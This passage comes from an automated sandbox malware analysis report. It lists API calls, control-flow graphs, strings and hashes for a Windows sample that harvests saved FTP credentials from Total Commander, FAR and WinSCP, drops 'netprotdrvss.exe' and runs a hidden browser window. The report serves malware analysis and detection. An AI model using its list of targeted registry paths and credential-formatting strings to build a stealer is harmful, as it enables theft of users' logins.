                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Opcode Fuzzy Hash: ad6e69e745eb0134cfaa1d61605679bf99b5aa58cc3a10e76cbc4c8091dfe4a8
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 242 403c10-403c73 call 40be9d call 405511 * 2 call 40848f 251 403c75-403c77 242->251 252 403ca9-403cad 242->252 251->252 253 403c79-403c94 ExpandEnvironmentStringsW 251->253 254 403cb3-403d15 call 405511 * 3 252->254 255 403dfe 252->255 256 403c95 call 4039ea 253->256 271 403d18-403d34 SHGetFolderPathW 254->271 257 403e00-403e08 call 4033a0 255->257 258 403e0a-403e12 call 40be3a 255->258 260 403c9a-403ca3 PathRemoveFileSpecW 256->260 267 403e13-403e17 257->267 258->267 260->252 272 403d36-403d39 271->272 273 403d7f-403d86 271->273 275 403d5a 272->275 276 403d3b-403d58 call 4039a3 272->276 273->271 274 403d88-403d8c 273->274 274->255 279 403d8e-403dce call 405511 * 2 call 40848f 274->279 278 403d5c-403d76 275->278 276->278 281 403d77 call 408248 278->281 289 403dd0-403dd2 279->289 290 403dfa 279->290 283 403d7c 281->283 283->273 289->290 291 403dd4-403df7 ExpandEnvironmentStringsW call 4039a3 289->291 290->255 291->290
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 403 4027e6-402809 OleInitialize call 40a469 406 402813-402819 403->406 407 40280b-40280e 403->407 409 402820-402832 call 405511 406->409 410 40281b-40281e 406->410 408 402c2d-402c31 407->408 411 402838-40284f call 40a345 409->411 410->409 410->411 416 402851 411->416 417 40285f-402862 411->417 418 402852 call 40a65e 416->418 419 402864-402867 417->419 420 402869 417->420 421 402857-40285a 418->421 419->420 422 402879-40287d 419->422 423 402869 call 4072ed 420->423 426 402c2c 421->426 425 40287f call 409f2b 422->425 424 40286e-402873 423->424 424->422 427 402884-402888 425->427 426->408 428 402893-4028a0 427->428 429 40288a-40288d 427->429 431 4028a2-4028ad 428->431 432 4028b7-4028be 428->432 429->428 430 40296a 429->430 435 402970-402978 430->435 433 4028af call 408f26 431->433 432->430 434 4028c4-4028cc 432->434 436 4028b4 433->436 437 4028d3-4028e3 434->437 438 4028ce 434->438 439 402c20-402c23 435->439 440 40297e-402984 435->440 436->432 441 4028e5 call 408f26 437->441 438->437 442 402c25 call 40a65e 439->442 443 402986-4029a2 call 40a569 440->443 444 4029bc-4029c0 440->444 448 4028ea-4028ef 441->448 449 402c2a 442->449 457 4029a5 call 4089fd 443->457 446 4029c2-4029de call 40a569 444->446 447 4029f8-4029fc 444->447 467 4029e1 call 4089fd 446->467 452 402a04-402a0c 447->452 453 4029fe-402a02 447->453 454 4028f1-402925 call 407573 SysAllocString 448->454 455 402956-402957 448->455 449->426 460 402a3b-402a44 452->460 461 402a0e-402a35 call 40920a call 409c49 SysAllocString SysFreeString 452->461 453->452 453->460 470 402927-402938 SysFreeString 454->470 471 40293a-402941 454->471 459 402959 call 40a65e 455->459 464 4029aa-4029b8 457->464 468 40295e 459->468 465 402a46-402a5a 460->465 466 402a6f-402a73 460->466 461->460 464->444 472 402a5d call 408f26 465->472 473 402aa2-402aa6 466->473 474 402a75-402a8d 466->474 475 4029e6-4029f4 467->475 468->430 470->470 470->471 477 402943-402945 471->477 478 402947-40294a call 4091bd 471->478 479 402a62-402a6c SysAllocString 472->479 481 402ad1-402ad5 473->481 482 402aa8-402abc 473->482 480 402a90 call 408f26 474->480 475->447 486 40294f-402954 477->486 478->486 479->466 488 402a95-402a9f SysAllocString 480->488 483 402b04-402b07 481->483 484 402ad7-402aef 481->484 489 402abf call 408f26 482->489 491 402b09 call 40a65e 483->491 490 402af2 call 408f26 484->490 486->435 488->473 492 402ac4-402ace SysAllocString 489->492 493 402af7-402b01 SysAllocString 490->493 494 402b0e-402b11 491->494 492->481 493->483 495 402b13 494->495 496 402b1a-402b2d 494->496 495->496 497 402b49-402b4d 496->497 498 402b2f-402b47 call 407573 496->498 500 402b55-402b66 call 407573 call 409c49 497->500 501 402b4f-402b53 497->501 498->497 504 402b6b-402b6f 500->504 501->500 501->504 506 402b71-402b7e call 40584d call 409c49 504->506 507 402b83-402b87 504->507 506->507 510 402b89-402b9c call 407573 507->510 511 402b9e-402ba2 507->511 510->511 514 402ba4-402bad call 40584d 511->514 515 402baf-402be1 call 40584d 511->515 514->515 522 402be3-402be8 call 408825 515->522 523 402bea call 408692 515->523 527 402bef-402bf8 522->527 523->527 528 402bfa-402bfd 527->528 529 402bff 527->529 528->529 530 402c01-402c0f SysFreeString 528->530 529->530 530->439 531 402c11-402c1e SysFreeString 530->531 531->439 531->531
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 004027F5
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Internet$InitializeOpenOption
                          • String ID: From: true
                          • API String ID: 1176259655-9585188
                          • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                          • Opcode Fuzzy Hash: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 532 402e3e-402e59 call 40d5b0 535 40327e-403286 532->535 536 402e5f-402e60 532->536 537 402e61-402ea5 call 40586b call 4058fb 536->537 542 402eb4 537->542 543 402ea7-402ead 537->543 545 402eb7-402ecb GetModuleFileNameW 542->545 543->542 544 402eaf-402eb2 543->544 544->545 546 402ed6-402edc GetCurrentDirectoryW 545->546 547 402ecd-402ed4 call 406cf9 545->547 549 402ee2-402f14 call 405511 call 4054ed * 2 546->549 547->549 557 402f16-402f22 call 405467 549->557 558 402f2a-402f94 GetLastError call 40a786 call 407552 call 405511 call 40584d 549->558 557->558 563 402f24 557->563 570 402f96-402fa6 558->570 571 402fa8 call 4056f9 558->571 563->558 572 402fad-402fd8 call 4054ed * 2 call 40584d 570->572 571->572 580 402fda-402fea 572->580 581 402fec call 4056f9 572->581 582 402ff1-403038 call 4054ed * 2 call 405511 call 4054ed 580->582 581->582 592 40303a-40304a 582->592 593 40304c call 4056f9 582->593 594 403051-403081 call 4054ed * 3 call 40584d 592->594 593->594 604 403083-403093 594->604 605 403095-40309b call 4056f9 594->605 606 4030a0-403132 call 405451 call 406d42 call 405511 call 4054ed * 4 call 40253c 604->606 605->606 624 403251-40325f GetLastError 606->624 625 403138-40313e 606->625 628 403262-403276 call 40a786 624->628 626 403144-403148 625->626 627 40322d-403235 625->627 626->627 631 40314e-403186 call 40584d call 407552 call 405511 call 40584d 626->631 629 403241 627->629 630 403237-40323f GetLastError 627->630 628->537 637 40327c-40327d 628->637 633 403244-40324f 629->633 630->633 644 403188-403198 631->644 645 40319a call 4056f9 631->645 633->628 637->535 646 40319f-4031c8 call 4054ed * 2 call 40584d 644->646 645->646 654 4031ca-4031da 646->654 655 4031dc call 4056f9 646->655 656 4031e1-403228 call 4054ed * 2 call 40253c 654->656 655->656 656->624 664 40322a 656->664 664->627
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Opcode Fuzzy Hash: 9ae992922a2ad1b825f1490aaeac56172bb5fbdf92c9f9a8e97600dc8421b205
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                          • RegCloseKey.ADVAPI32(?), ref: 0040442A
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: HeapOpen$AllocCloseEnumFree
                          • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                          • API String ID: 416369273-4007225339
                          • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                          • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                          • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          • API String ID: 1987340527-3375436608
                          • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                          • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          • API String ID: 536389180-697497794
                          • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                          • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          • API String ID: 3472027048-2333287219
                          • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                          • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          • API String ID: 1473721057-3317424838
                          • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                          • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          • API String ID: 3546245721-1332223170
                          • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                          • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                          APIs
                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          • API String ID: 2141107913-3455059086
                          • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                          • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                          • StrStrIA.SHLWAPI(?,?), ref: 00404913
                          • StrStrIA.SHLWAPI(?,?), ref: 00404925
                          • StrStrIA.SHLWAPI(?,?), ref: 00404935
                          • StrStrIA.SHLWAPI(?,?), ref: 00404947
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                          • API String ID: 1635188419-1322549247
                          • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                          • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          • API String ID: 3166187867-0
                          • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                          • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID:
                          • String ID: http$+@
                          • API String ID: 0-4127549746
                          • Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                          • Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1335363161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_fmlgbgc2p5.jbxd
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
